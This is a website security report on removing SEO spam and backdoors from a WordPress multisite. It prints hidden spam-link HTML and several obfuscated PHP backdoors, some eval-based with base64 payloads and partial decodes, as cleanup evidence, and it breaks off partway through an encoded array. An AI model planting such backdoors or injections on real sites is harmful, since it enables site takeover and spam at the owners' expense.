Sec Report

Website SEO Spam Removal Report
http://domain.com
Contents
1 Task: Remove SEO Spam and migrate site from WP multisite to single ............................................... 1
2 Discovered vulnerabilities ..................................................................................................................... 1
2.1 Injected code examples found in posts: ....................................................................................... 1
2.1.1 Example 1: ............................................................................................................................. 1
2.1.2 Example2: .............................................................................................................................. 2
2.1.3 Example 3: ............................................................................................................................. 2
2.1.4 Example 4: ............................................................................................................................. 3
2.2 Backdoor scripts found ................................................................................................................. 3
2.2.1 Location: wp-content/themes/user/functions.php ............................................................. 3
2.2.2 Location: wp-includes/images/crystal/swfmacwheel.php .................................................. 4
2.2.3 Location: wp-includes/js/tinymce/plugins/fullscreen/ie_png.php...................................... 7
2.2.4 Location: wp-includes/js/tinymce/plugins/fullscreen-randomfunctions.php ..................... 9
2.2.5 Location: wp-content/plugins/aegis.php ........................................................................... 11
2.2.6 Location: wp-content/uploads/emmos.php ...................................................................... 11
2.2.7 Location: wp-content/blogs.dir/swift.php ......................................................................... 12
2.2.8 Location: wp-content/themes/openvme.php ................................................................... 12
2.2.9 Location: wp-includes/ID3/x11r3.php ................................................................................ 13
2.2.10 Location: wp-includes/js/dcn.php ...................................................................................... 13
2.2.11 Location: wp-content/backup-db/ieupdate.php ................................................................ 14
2.2.12 Location: wp-includes/Text/Diff/Renderer/tabs.php ......................................................... 16
2.3 Exploits found: ............................................................................................................................ 18
2.3.1 TimThumb Exploit ............................................................................................................... 18
3 Fixed Vulnerabilities and Rescan results ............................................................................................. 18
4 Suggestions ......................................................................................................................................... 18
4.1 Disable insecure/dangerous PHP functions like eval function on server. .................................. 18
4.2 Secure Wordpress website ......................................................................................................... 18
1 Task: Remove SEO Spam and migrate site from WP multisite to single
Details:
https://sitecheck.sucuri.net/results/domain.com/
image
We have spam on our site, also I want to have the installation moved from network to single wp install
on our plesk server.
2 Discovered vulnerabilities
2.1 Injected code examples found in posts:
2.1.1 Example 1:
<div style='position: absolute;left: -3667px;'><a href='http://bonacousa.com/kredit-zalog-
nedvizhimosti/'> bonacousa.com/</a></div><div style='position:
absolute;left: -3752px;'><a href='http://meta-osvita.com/tehnicheskij-anglijskij/'>meta-
osvita.com</a></div><div style='position: absolute;left: -3818px;'><a href='http://nissan-
ask.com.ua'>http://nissan-ask.com.ua/</a></div><div style='position: absolute;left: -3595px;'><a
href='http://www.viagra-generica.com'>viagra-generica.com</a></div>
@ 1
2.1.2 Example2:
<div id="Leyout101" style="text-indent:-26529px;width:0px;height:0px;color:#ffffff;font-
size:0.1px;display:none;"><script
language="javascript">document.getElementById("Leyout101").style.display="none";</script><a
href="http://www.physics2005.net/toms.php">toms outlet</a>
<a href="http://www.physics2005.net/toms-outlet.php">toms outlet</a>
<a href="http://www.physics2005.net/toms-outlet.php">toms outlet</a>
<a href="http://www.paulcash.co.uk/michaelkorsonline.php">michael kors uk bags</a>
<a href="http://www.prettiness.nl/wp-content/uploads/hollister-shop.html">hollister online shop
deutschland</a>
<a href="http://www.physics2005.net/toms.php">toms outlet</a>
<a href="http://www.leecommunications.ie/wp-content/gallery/italviero.php">portafoglio alviero
martini</a>
<a href="http://www.physics2005.net/toms.php">toms outlet</a>
<a href="http://qa29.it/">prada portafoglio</a>
<a href="http://www.leecommunications.ie/wp-content/gallery/italviero.php">portafoglio alviero
martini</a>
</div><div style='position: absolute;left: -3851px;'><a href='http://teplostar.kiev.ua/catalog/gorelki-na-
otrabotannom-masle'>http://teplostar.kiev.ua/</a></div><div style='position: absolute;left: -
3761px;'><a href='http://service01.com.ua/%D1%80%D0%B5%D0%BC%D0%BE%D0%BD%D1%82-
%D0%BF%D0%BE%D1%81%D1%83%D0%B4%D0%BE%D0%BC%D0%BE%D0%B5%D1%87%D0%BD%D1%
8B%D1%85-%D0%BC%D0%B0%D1%88%D0%B8%D0%BD/'>http://service01.com.ua/</a></div><div
style='position: absolute;left: -3771px;'><a href='http://winnerlex.com.ua/nashi-uslugi/nalogovaya-
praktika/otmena-nalogovykh-reshenij'>http://winnerlex.com.ua/</a></div><div style='position:
absolute;left: -3686px;'><a href='http://showroom-kiev.com.ua/category_145.html'>showroom-
kiev.com.ua/</a></div>
2.1.3 Example 3:
<div style='position: absolute;left: -3682px;'><a
href='http://babyforyou.org/'>www.babyforyou.org/</a></div><div style='position: absolute;left: -
3717px;'><a href='http://bonacousa.com/kredit-pod-zalog-avtomobilya/'>
bonacousa.com</a></div><div style='position: absolute;left: -3982px;'><a
href='http://www.etalon.com.ua/dispenseri'>www.etalon.com.ua</a></div><div style='position:
absolute;left: -3597px;'><a href='http://www.pillsbank.net'>pillsbank.net/</a></div>
@ 2
2.1.4 Example 4:
<div style='position: absolute;left: -3522px;'><a
href='http://baly.com.ua/gallery/6/'>baly.com.ua</a></div><div style='position: absolute;left: -
3795px;'><a href='http://bonacousa.com/kredit-zalog-nedvizhimosti/'>
www.bonacousa.com/</a></div><div style='position: absolute;left: -
3935px;'><a href='http://goodgoods.com.ua/g8737298-tabakerki-
futlyary'>goodgoods.com.ua/</a></div><div style='position: absolute;left: -3846px;'><a
href='http://www.pillsbank.net/rezeptfrei/kamagra'>www.pillsbank.net</a></div>
2.2 Backdoor scripts found

2.2.1 Location: wp-content/themes/user/functions.php
Original source code:
@ 3
$O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6
%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O00O0O=$O00OO0{3}.$O00OO
0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$
O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{2
4};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00O
O0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};eval($O00O0O("JE8wTz
AwMD0iUHh0RFFxZnpZYWhtd0N2Wk51QmpMWHNNVWtJS0piSEVXT2dGeVZBU0dpUm5sVGRjcm9wZU
5GU0JIREpreFViS1lDc0VHWHRmakl3cW5ocEF6Z1JsV1Z2ZW9UeW1hdUxkaU9yY1BaUU1OQjlZVVJ5R0N1
TEtyV1NGcEIwdkhDTEpMMFRuV29yS3JXU0Z6MTA3cGFpS0FDTEtyV1NGcEIwOXBDcjB6b2k3RVdHWmdv
YnlFSUViZ0N2aEkxdE5uMUxnejJFMXgyUzVnM24wcWtwRnoxMFFBT1NpTWFpMFYzMEdDS1RmVWE4dn
hJdFFuS1RGcldUa3JDdlFWWTBBRWRUWHgzTFFnMjR2eEl0UW5LVEZyV1RrckN2UU1ZMEFDV2lLQWx5aE
kwcmVUZXdkZzN5ZElteTlObXlkeDJiaXgyd2RBSDBBQ0hpN0JIWnpDbXRvRUlMMWNLNHZwS0dzZ0s1aXgz
TER4SzFzcktUUWMyOVBwZndHQ3ZoenBhVDRVSUhaQU93R0N2aHZwQ3l2SkgwQUpIMEFOazQ9IjtldmFs
KCc/PicuJE8wME8wTygkTzBPTzAwKCRPTzBPMDAoJE8wTzAwMCwkT08wMDAwKjIpLCRPTzBPMDAoJE8
wTzAwMCwkT08wMDAwLCRPTzAwMDApLCRPTzBPMDAoJE8wTzAwMCwwLCRPTzAwMDApKSkpOw==")
);
Decoded:
<?php $O0O000 =
"PxtDQqfzYahmwCvZNuBjLXsMUkIKJbHEWOgFyVASGiRnlTdcropeNFSBHDJkxUbKYCsEGXtfjIwqnhpAzgRl
WVveoTymauLdiOrcPZQMNB9YURyGCuLKrWSFpB0vHCLJL0TnWorKrWSFz107paiKACLKrWSFpB09pCr0zo
i7EWGZgobyEIEbgCvhI1tNn1Lgz2E1x2S5g3n0qkpFz10QAOSiMai0V30GCKTfUa8vxItQnKTFrWTkrCvQVY0
AEdTXx3LQg24vxItQnKTFrWTkrCvQMY0ACWiKAlyhI0reTewdg3ydImy9Nmydx2bix2wdAH0ACHi7BHZzCm
toEIL1cK4vpKGsgK5ix3LDxK1srKTQc29PpfwGCvhzpaT4UIHZAOwGCvhvpCyvJH0AJH0ANk4=";
eval('?>' . $O00O0O($O0OO00($OO0O00($O0O000, $OO0000 * 2), $OO0O00($O0O000, $OO0000,

$OO0000), $OO0O00($O0O000, 0, $OO0000))));
2.2.2 Location: wp-includes/images/crystal/swfmacwheel.php

@ 4
<?php $bwkw =
array('eNrFOwdX20i3f4WwORv8UaJuaYnzEZppJmDALZvDkWXZF','pZLXLBNNv/93bl3ZlQsSHib894mUZm
5c+f2MvKuBe21jT','ft2cCbBsPBvb8IJtPJxrswfJfLrX1fExNrYbjxNsh9f+s','WPo3H7nLj3butd7V5oYC3d2s77/
CRPdTY5ZN8vZhHj0ub','PV6w505slF1x5rbqWOzFrS7YbVK/sRUEYZcHxNs5L7L75','WOztt9lTy18D4Nm8S5
/esSe1dubu7sOe/p8YCBtn5f7Nc','JrsluvqeNKdnk6PTLvTg/rsxJ7O+ghGeyxyi4Ou1hAzqT','Onm6QUhVJegB
SjhHNqMlu/fJjSy/lT4+BjGMY67PBMruw','8c5teN25vDEWn9nIcj9sBoimcveEnHa8Ae5glXAPw+R7z','Eo3v
U5ZQ9AHl900G3GyS+nh0/zzIYoF4ZGFh9PF5c0+ey','q6tbOwgbQ5BorwqcTZNBZc2i6yuWCSVpEl9grks1szx
hJ','7B7bYTbAbZw01inphLKJCkcXK3bKHc2WtgsS5nHxGOpKC','7H9CtZUOrztE02LCBkjkxApqT1rXWVjvh7g
Lsndgzy8e6','oU0Sysa4wYUYw/1pyMhcTZHsTlk6zZkV9Ag4mQsEnvs9e','5pgjAeuwzqoEHDpL1OZ6XbT7jX
6VErrGvTR9LCKbvOYW6','O1nB7pOAIGm9j5KHlVPpkpJ3H0tLQiP6jObDo4ctxv1Fx','psiGVg5huKkDRegJTlC
vXYaNIgho6517Ula8wyHKHDwRH','ZX5HbneKbkeeRc4ZsyR8W/cd5Fm+XpdvUQWG7X9yEPvUP','DdZr+l1
qut8HOwj2JDsgJV9ZZzFFSjauRRWLe4dE7ejYv','nh9dDtgUalObMyIsqDy1pBIjxsfkwlCZ3rS2kR3gaork8','6Cj
ngAawwSMxzTk/oMBzVTxbnh4g95ucV2XxWNeOFTIfZ','1Y7HD4yiyo6yGi9Viar0QzrlKLb4TXdkAikB83jQFI
mJH','kWSO/UL4P6Q+kWVb04C3DM/Hwjzf2BLMLrnz4dIVsIj2N','ovSrHtaCxIwlXOqg/XN52hH4Y2YxkRi4
MIW4eVJELvdVu','Re40qWmNR69YmQFo6VqSfoUS76inJ5eKX12EVzetB5LBg','qT9MJrWa2ekEc0YsIer3iW
G5WbQQu2eFnmgQI0iu5Omdt','zjMkTDP1BQXGV0p+5Z5XBiX2gd9aoTM8VIddLXkoplrhF','ZybxBysFtE2b
taeQ74DdkT4QR/Qd8h3SNkkdTAz/CiJ2x','sqaFszoZn9ooVtrc5biDYpDk4ABaMcj0L9sYsggUVjzVq','2eoEgD
FJa2q+cBzGgq5OSgJFus8svH01W6taq9ZPTbYZr','CR2iqGjzwkKJT9VMFxU68o3gn6Fk7VtDNio98IvT5yPGu'
,'QtyOGKqpm2tTPTNxTW4yaSEyoMJNBq7jT0ESvpZIatbMl','iRbJbDeLzoAhhBshqSy9vrP0orDU6IcTkIPqFcE
XZRIuP','0W8xyxYpvBIDogVZIESFvLAfCoVgFiTsgG5RDKpKCALlb','ImymKGy7gsqhWSAfKPYiL+gffriAuU6Nk
SIIFnjCaSb8F','zFE1pK8Y3QqKKkP9qmfIj453pvNVGjolXlEMtyWvtU6IO','48G7fOQcVu7UY0ph5fZdD+3sCp
UflWk1euSL7og1EdJub','pC4/bsajjXObo9wAIPVNQKrx2zZUfe6puKSY4pxmJVrmd','UgVU/zGTHcmZ0HZbt
2YA6pqFNwnI+hIDD9o82WMfFdBMN','e+1j69wwNpnY5v0AfZnPzmYsx6XJ+husW3gXmk9EQ8GNd','wmD
q6K+N6dnJwpOprH+peDKYoyIYHYpXnPfOrxNx5+Jp0','W0cGrPzh9hyCHBXgfPkkjNcPFFibJyUNoFqwISqhn
eM3J','sX+uWIMFH4eUDRISi+90+XqK7AkRWTe53MzLRDUEIXZMR','IbyGitFM5QIQlYycDiXbfRLAipKdb49
HTejFWIRudbuLU','A07Jeh6lIDYHQVMQ7ElTQ9zOU7QZlQa10qbkgUkGZe6Ez','RpJBuf0UpwA7lEP7pPYieJ
nU7scc/aE33DCepTSPS57B9','7hGbNxiWN9aFRNhVIa8YDGh9gvqawalIUOnvgSt0YOehU','Y366O5xis61pI
dvNkUIaccwNYKGieg+tNbrqMENyxPrgm','bRMxSY2iZQ8Ro77fbQ4W/aZmKu1ieYSRL+h1aA4pMaEFc','gA
1epCLYqpgzdLQukr7hKpesrny8LyyeCImR563HDVLB8','qyVptIK2nD/HnQnbdOFnOfWiPw0C5VxX30/mWjv
4AGYKG','5tcsRFOQTF7VWNhluwCutz1sOh5RTK0pTR/RD9OZquQfF','4IiLBPVTv9kfev1K/4r6oG8odJBu/VZ
atXex7D55xWNUU','rvYeGwOyrKO5dkVnfCcvOGxQvmcfGw+9EiU6OZkOSmR6m','UUJSdriPrXEXFIxXmDh
WO7hc/hk1s9GzWj4hS16t+EINa','hVZNBq/TtvHgMeQfR2i6R2YO6YXZ+Y8BcNyQzbQ1B5Do9','I1uKewC4
UOACX+mbTI5Pn6alUMXGpYSTKuyLEh5K+Z+Ub','e+kM+JOJsSMQAhDRTbK4+oGjVkW1CR2EjkF6uMZF7k
N1Q','t6+fktGXulhiIm/2ZixpyBNR23XGQHRR1QWyhEfRGMEFX','KktCqBcufQ2mcZLnITrcb1bHlx3YRi89Ro
1iG/gwstu9o','UIb0myR2pKjGxcfxMSvvtmq4dtSQFWSZ4hPDIQ8fUBTdU','5zvLhtSB3VhKmiB4NgIAHGB3
WVsOD+5nEdFjRlZa9+Zgc','p7UYtbH0EQq/DoGomTAkDCYjGqxkWJhZgThdTRIzgrOir','alkriI5bIQZlzUtFLpS
BZO3dSclAUKVMRVw8WHxD+TCHO','z2FMjChCEGVRqpBU8SDE16XOvVp3LmRmwHjIRIaqYSJj4','kK6qqb
d6CNLM1S1EBWqnERFrV+UjPTWHJY8Uhldwe18jr','ql74MlIjqlQb2LRVmG4gPPZaTQ0VPrhFVmLJyJggR1C
2F','s324WK/3WQUhSpCaBcWLVuL9LLVQmMpZfyFYubPl0JDO5','RE4UkpA0Nl5NaJSNL1TpoyPszKDAGEis
NoHydBv1nldUH','GLt7j2Z9ukheXajqj5dyUZ4wlInJbd9+4qsV6ZZFPWTQa','Blci5KcGh17YNPNlU85VED3ZK
DQtpkKZNotDGNsnexKda','Io9YJpvbNNqcL3UOjKOrxTU/KQevQlFwCfUodsV6zxp3K','4f0eFX/lsER1UbnSxa
x6TfmXQ6Gz1AlKlhRUm7ajQ8uLP','qiXF26DS1YqxlpMrEA0SHEHZE6or1ubMji3QAThmfCAst','j5rU0VR8yn
Decoded:
@ 5
<?php if (!function_exists('ll')) {
function ll($i) {
$a = Array('', 'Xw==', 'Xw' . '==', '' . 'X' . 'A==', '' . 'Lw==', '' . 'Ly8=', 'L' . 'g==', '' . 'Ly' . '8=', 'TW96' .
'aWx' . 'sYS80' . 'L' . 'j' . 'AgKG' . 'NvbXBh' . 'dG' . 'libGU7IE' . '1TSUUg' . 'OC4w' . 'OyBX' . 'aW5' . 'kb3' . 'd' .
'zIE5UIDYuM' . 'Ck=', 'T' . 'W' . '9' . '6aWxsY' . 'S' . '81' . 'LjAgKF' . 'dpb' . 'mRvd3M7IFU7IFdpbm' . 'R' .
'vd3MgTlQgNS4xO' . 'yBlbi1' . 'VUz' . 'sgcnY' . '6MS' . '45' . 'LjAuMSkgR2' . 'Vja' . '28' . 'v' . 'MjAwOD' . 'A5'
. 'M' . 'jIxNSB' . 'GaXJlZ' . 'm94L' . 'zMuM' . 'C4x', 'TW96aW' . 'xsYS81LjAgK' . 'Fdp' . 'bmRvd3M7IFU7' .
'IFd' . 'pb' . 'mR' . 'vd3MgTlQ' . 'g' . 'NS4xOy' . 'Blbi1VUyk' . 'gR2V' . 'ja28' . 'vMjAwM' . 'z' . 'A' .
'1MDQgTW96aWxs' . 'Y' . 'SB' . 'G' . 'a' . 'X' . 'JlYmly' . 'Z' . 'C8wLjY=', 'TW96aW' . 'xsY' . 'S' . '81' . 'Lj' .
'AgKFdp' . 'bmRv' . 'd3M' . '7IFU7' . 'IFdpbmRv' . 'd3Mg' . 'Tl' . 'QgN' . 'S4xOyBlbi1V' . 'Uzsg' . 'c' .
'nY6MS45Lj' . 'IuMTAp' . 'IEdlY2tvL' . 'zI' . 'wMTAwO' . 'TE0I' . 'E' . 'Zpcm' . 'Vmb3' . 'gvMy42' . 'LjEw', 'c2' .
'FmZV9t' . 'b2Rl', 'b3Blb' . 'l9iYXNlZGly', 'aHR0cDo' . 'vLw=' . '=', '', '' . 'Iy' . '8' . 'j', 'Lw' . '==', '', '', 'Lw==', '' .
'L' . 'w==', '' . 'QWNj' . 'ZXB0' . 'L' . 'U' . 'xhbmd1YWdlOiBl' . 'b' . 'i11cywg' . 'ZW47c' . 'T0' . 'wL' . 'jU' .
'wDQo=', 'Q' . '29ubm' . 'Vjd' . 'G' . 'l' . 'vbjo' . 'g' . 'Q2x' . 'v' . 'c2U' . 'NCg0K', 'DQoNCg' . '=' . '=', 'Cg==',
'PGJyIC' . '8+', '', 'L0xvY2F0aW' . '9uXDov', 'TG9j' . 'YXRp' . 'b246IA==', 'DQ==', 'D' . 'Qo' . 'N' . 'C' . 'g' . '==',
'', 'Ji' . 'M' . '3NiYjMTE' . 'xJiM' . '5OS' . 'Y' . 'jO' . 'TcmIzEx' . 'NiYjM' . 'T' . 'A1Ji' . 'MxM' . 'TEmIzEx' .
'MCYjNTg=', '' . 'TG9jYXRpb246', 'Y' . 'Wx' . 's' . 'b3dfd' . 'X' . 'JsX2ZvcGVu', 'MQ' . '==', 'PG' .
'g1IHN0eWxlPSdj' . 'b2xv' . 'cjptYXJ' . 'vb24n' . 'PkNh' . 'bid0' . 'IGR' . 'vd' . '2' . '5sb2FkIA==', 'I' . 'C0g' . 'RV'
. 'hJVDs8L2g1Pg==', '', '', '', 'Cg==', '' . 'c' . 'g' . '=' . '=', '', 'c' . 'G' . 'lwZQ==', 'd' . 'w' . '==', '', 'c2FmZV9tb2R' .
'l', '' . 'b3Blbl9i' . 'YX' . 'Nl' . 'ZGl' . 'y', 'c2FmZV9tb2R' . 'lX2luY2x' . '1ZGVfZGly', 'c2' . 'F' . 'mZV9tb2RlX2V4' .
'ZWNfZ' . 'Gly', 'ZGlzYWJs' . 'ZV9' . 'mdW5jdG' . 'lv' . 'bnM' . '=', 'YW' . 'xsb3' . 'dfdX' . 'JsX2ZvcGVu',
'bWF4X2V4ZWN1dGlvb' . 'l90' . 'aW1' . 'l', 'b3V0cH' . 'V0' . 'X2J' . '1ZmZlcml' . 'uZw==', 'b' . 'WV' . 'tb3J5X'
. '2xpbW' . 'l0', 'Mj' . 'U2T' . 'Q==', '' . 'ZXJy' . 'b3' . 'JfbG9n', 'bG9nX' . '2Vycm9ycw=' . '=', 'ZmlsZV91cGxvY'
. 'W' . 'Rz', 'YW' . 'x' . 's' . 'b3' . 'd' . 'fdX' . 'JsX' . '2Zvc' . 'GVu', 'bWF' . '4X2V4' . 'Z' . 'WN1dGlvb' . 'l90aW1l',
'b3V0cHV0X2J1Z' . 'mZlcmlu' . 'Zw==', 'bWVtb3J5X2xpbWl' . '0', 'MjU2TQ=' . '=', 'Z' . 'XJyb3JfbG' . '9n',
'bG9nX2Vycm9yc' . 'w==', 'Z' . 'mlsZV' . '91' . 'cGxvYWR' . 'z', 'YWxsb3df' . 'dX' . 'J' . 'sX2Zvc' . 'GVu', 'XA' .
'==', '' . 'Lw==', 'RE9DVU1FTl' . 'RfUk9' . 'P' . 'VA==', '' . 'XA==', 'Lw==', 'U' . '0' . 'N' . 'SSV' . 'BUX0' . 'ZJTEV' .
'O' . 'QU' . '1F', 'UEhQX1N' . 'FTE' . 'Y=', 'XA==', '' . 'Lw==', '' . 'KF' . 'wu' . 'cGguKiR8XC5o' . 'dG0u' .
'KiR8XC5' . 'za' . 'H' . 'Rt' . 'LiokfF' . 'w' . 'uY' . 'XNwLi' . 'okfFwuan' . 'NwJH' . 'xcLm' . 'podG0k' . 'fFwuY2' .
'ZtJHxc' . 'L' . 'mN0c' . 'C' . 'R' . '8XC50cGwkKQ' . '=' . '=', 'LzxhZD4uKjxc' . 'L' . '2FkPi9zaQ==', 'Lz' .
'xhZHM+Lio8XC' . '9hZH' . 'M+L3Np', 'Lzxi' . 'YjE' . '+Lio8' . 'YmIyP' . 'i9' . 'z' . 'aQ==', '' . 'L' . 'z' . 'xiMT' .
'4uKj' . 'x' . 'c' . 'L2I' . 'x' . 'Pi9zaQ' . '=' . '=', '' . 'Lzxi' . 'YjE+' . 'PGJiMT4vc2k' . '=', 'LzxiYjI+PGJiMj4vc2k=', 'L' .
'zxhZD' . '4uKjxcL2' . 'Fk' . 'P' . 'i' . '9z', '' . 'Lzxl' . 'bXM+' . 'L' . 'io8X' . 'C9lbX' . 'M+' . 'L3M' . '=', 'LzxibG' .
'9jaz4uKjxcL2Js' . 'b2Nr' . 'Pi9' . 'z', 'L' . 'zxkaW' . 'c+Lio8XC9kaWc+L' . '3M=', 'LzxjZW50' . 'cj' . '4u' .
'KjxcL2Nlb' . 'nRyP' . 'i9z', 'LzxjaXR' . 'zPi4qPFwv' . 'Y2l0c' . 'z4v' . 'cw==', 'Lzx0Y' . 'nQ+' . 'Lio8XC90' . 'YnQ' .
'+L3M=', '' . 'L' . 'z' . 'w' . 'oc' . '3Bhbnxmb250fGRpd' . 'ikgc' . '3R' . '5bGU9Lioo' . 'aG' . 'Vp' . 'Z2h0fHdp' .
'ZH' . 'RoKVxz' . 'KjpccypbMC0yXXs' . 'x' . 'fVxzKihwdHxwe' . 'CkuKihv' . 'dmV' . 'yZmxvd3x2aXNpYmlsaX' .
'R5KVxzKjp' . 'c' . 'cyooYX' . 'V0b3x' . 'oa' . 'WRkZW4p' . 'Lio+Lio8YSBocmVmPS' . '4qP' . 'FwvYT4uKj' .
'xcLyhzcGFu' . 'fGZvbnR' . '8' . 'Z' . 'Gl' . '2KT' . '4vVX' . 'Np', 'Lzwoc3Bhbnx' . 'm' . 'b250fGRpd' .
'ikgc3R5bGU9' . 'Lioob' . '3Z' . 'lcm' . 'Zsb3d8dm' . 'lzaWJpbG' . 'l' . '0' . 'eSlccyo6X' . 'H' . 'MqKGF1dG9' .
'8a' . 'GlkZGVuKS4qKGhlaW' . 'dodHx3aW' . 'R' . '0aClcc' . 'yo6X' . 'HMq' . 'W' . 'zAtMl17' . 'MX' . '1ccy' .
'oo' . 'c' . 'HR8cHgpL' . 'io+Lio8YSB' . 'o' . 'cm' . 'V' . 'mPS4qPFw' . 'v' . 'YT4uKjxcLyhz' . 'cGFufGZvbnR8ZGl2'
@ 6
2.2.3 Location: wp-includes/js/tinymce/plugins/fullscreen/ie_png.php
<?php $azwskh =
array('eNqlWgl3Gsey/itEx8cS7zrO9CzARCEHLSAhC7ggG','AGODweGEduwXBaxOP7vr7uquqdZpOTexDHD
dFd/XX','tXF44NXmIXP72sJv5yMJ20gs1gsVxcnIfheTwe+x6','TE7EwvPgwiH//0E5fzeft7cW5b+bGTe889vnc
XXZM','8ayE55/OO9Z12BFvoTsQj0a9GDbvYGDLp8Uq8dL0x','Cq+gn+viw8zXDXMDWveeS9N8X4nycXLm
MgBpm56dv','O5KL6/aMi0atd4Fl8exMcCdwIeYdfusyMewy4ue+1','MCuJLmi9vPG+AvGN1X7rAFULUzearf
+ethGhi4Dln','AwPwXXwUWfeOI4Wu0X5mQgOI4hn+vfgGuxt184E1x','83QBzbCVXOdTktSQPGWuOzBqZu
bGY6BcgwiK1Rhy6','KQtP6w5ZSggM6dK54Twd6dO+GsbcW7P3bxifvA0nG','44GoU3xhMgb42r6ivyk7oAIT
aLEAH9UiFug6ewSA2','DoMhWBc1/woSRHroWCCYARvd7+kBpPPH+3pQGvWW8','B2Wc32Ad2zEJ9dLKP
TBdUF6EKO6Lk7pgetAGrkpdA','BboB5QB+KD6wH2P9QDAIPr1B+4L4BDSV1UgQyQEm1','yn8ZTyngcim9X
4qMnPr7ALuCwr0rS+nWfvFB8DGDs','rpYUj7z4yLLqk3jWar3SDah8Xdpeq3BpPzsjYm+Xz','zq1/C0wvQJ/Bv
pRmsINYweMjPtJFwW0kFtsgEEKYd','QGa1UM/3b6+kjWwQX5bQqCh78+rkGjclIMwMujGI7','myhilw2Ydtj
Iea6DqfmfcZajjrtJAacDzxoChSbbr','XhRgdtKvGmtUam19W54CtOmuOmNvCLEHm0x7ZfQS0','LFv1oo3PQ
PVj/zfio+y+JgWQUM9YFL7+u+7h23+Jv','WvSOZHg5zDzBltNPeqzjVD09U7d9ioV2aoXgiKRP4','KsG7Lyutu5
aY9qbGHQcEqDhrDQjW74d8hKZWeGqhe','8R3AMVnkd1ngAemVZzG+bsPXEw24DNBFHtAYFqvKC','cXOV
UwWOssJPlxReerhqcrygrI4bIIhHod5A5jx1q','tn2KSxLHkqh3QKNwYGKIwJmis+b8wFxO7BB38YZo3','6jdM
pPBnburdYw1g17IJtAVIsYf5jyOf4+Bd0peKu','4qPNQaxt0QO/UjtwSMWBioqnBTIPHPHlHrhGYWCwu','lwO
u4IGJUwkBC0HpiokfzNijK1XyikFF5jeQFZlua','5k2inu7wj5HXYE+9CuuCMk9h0kMb68AOuUfMqcgny','JXIU
qNQPtI5gZVCdNXdj1Ufsa888R0+KTZJfQC7UU','DJTnRgMP2eDp4yF3GM/IBcEjB8CSNB7IWi1yYcB4V','iFUv
K5KVWHY/LaIeULtimrbouw2uvHtNakTUiKDsd','x6RbQ2GCsnvcwsao4ITA9h2U7AwfuujDtdOXxIjKD','ZUc5
tYRcKhoGtQnmPueKwK8NhU+SaLFQba92Ohw64','E3yPIBxJHvhe2peJSdMD/x7JMdoRuVkISQ4YL29VV','G
SdAtubMpEZ0tpQpX9S1I6mFUPFW4BhNL4rXUX5HK','w9klMgmm4+3CGP2kPIrYwAEBty/Fo6T+k2RIbLaW
Q','IHMKm6W2JW7N02xfacuBgbzBprSimrkn3kKFIS/k1','Jy/dYiHBN9gKZRFvhibutoDhF+WFpkTYFXIkUtVX
G','U2aihSrKdFWIoEXopthrPhY29zY3Kk1n/FkQEv920','UyW6lalm4lXEpZUvg2PxIEEpoJdk6DqDkh5o5nFTR
','81ReaghqpgCcOilehTRsO8QvyF3NyWUEWlGQZYL0k','UYc16X1og+EIkSuktOiwKTDNJ7yFiVmgT2k9K0+J
K','HsCOTKqoCATwIKCsoBUaigia1P3om2e1WkBSVfEsQ','o8jemSOuxlSIGQ6xLpAE8QrK1FGkQo6dDcY8XJk
Wc','koJ415zI77u8MWwvDRNFXsCmHHx4uPABMaV50zZCY','VF7ioArFQWuoiEQflHFOuapg1QX5rneSVAb
ATgYJ1','hky9aE21VKKTFMj0ZhUZRrlrvIGd27ompTyEQSFnl','wGGVX4rKG0KJhUPhoxiqEH3CgNPqkTT9ciq
qGmMbP','HiJ4H9hSOteSurpTdk8fzgQzEmGSqZhHDTlQMGUdi','R+TOvkl7suw40hblYYwCdXrJ5ZvisCDjkI6
hXQGOI','V9ZRzvM0ZW10gKYEbHWoORr26qI8fAyeFh9IbktnU','XGTSFkUR2AVYgq6NRVRxZwsqAR9R+Pq
2ood5GlglS','DjMwiz+FFcRqEem2jmOJRKvW/LVRzuqOs6xSGhV46','yqxZcYRC6sDcB1ZXebx426BSl/jEIqOo
ZZwi1DBRE','Qowh3VLJaqGxLEkSHL6WQlJy4aapprXCiznKHHddj','UotatRgpIH5VQnNGRi5SC4XBagWbEEO
RiWowbCyFH','FlV7C8TqgoJJXHo/hLPKrkrSKni2YEgQo4LkUKiuX','PLlp1lIlTxWOLy45rNQ8WJAYZC7kr6wn
VaaVZnQW9','aWNEBHvgySSxXW+kqbEGvno3EG9jwwZqMXqteR9Az','FCzlLYjfaT6ZWt5Sm7AKe0hNEKwK
iELg6V7zvqYI8','SqZBjXSxrp7YsL7N4FSTrlW6vI3miumtX7EWhA6dV','T69flC+Jy1tBi7KqOg9FPRB5aLVMVS
qGVrEK1RIaG','ZjTSn88SrEGLrCjGhiTTqnaJXJfN+leDtZspPb4Er','UOkLGesV+N9CN1CM0eXAllYQNLPajlS6q
qqlnKXsD','NUdEeldNXTpTK1ZVC5QdMvDAklrVFr+RKeTE4oOm+','NrEXIZotPjawoqbbBPTbgb2LK8jJY1eEa
YMe2Pnqd','821hPVhCLxhBtvcebLy9nH9AHs6ZeIJEoePTadF+9','lbda+UI8COFjbI4IKM7Pt3/bVsAD07o+Dp
GvwZ3x+','22MzFnhwn66Kg2+Y9cLVt1vEKQAw3zH7fH29egexe','dYfB1Ni2snyrEvoY//59aLTv3JWk0PqvHa
1JBkx62','06k7s5dOEC0riWH7kNI90F0p+ned2cgtOktmnXIwa','i13BK1v0F/jMIqwDbnSpn0zrMB6AGb22P
QM+w8pg4','09AhVO7nznFt0zdy2WY64MLt4SEaWeMl54GHUyfQf','R7lJE3vUhnLP2xk2DO8LvTr4nQt9uH
ZZb87Vw2X/E','chn1xB63qwbqIxTU9XTC656RL0/DmzJipdl2B9DPC','+rPL9YQ31zinIlGz6pph/EERkwaqKBk
ZTNIEKbZWW','wbpSPsFW76txDtq2Nog1BSlbJ1Y1ctpIDez3lKrVa','zvVqoBcPysE6fM+hs9ecmkCBoeLTkwK
@ 7
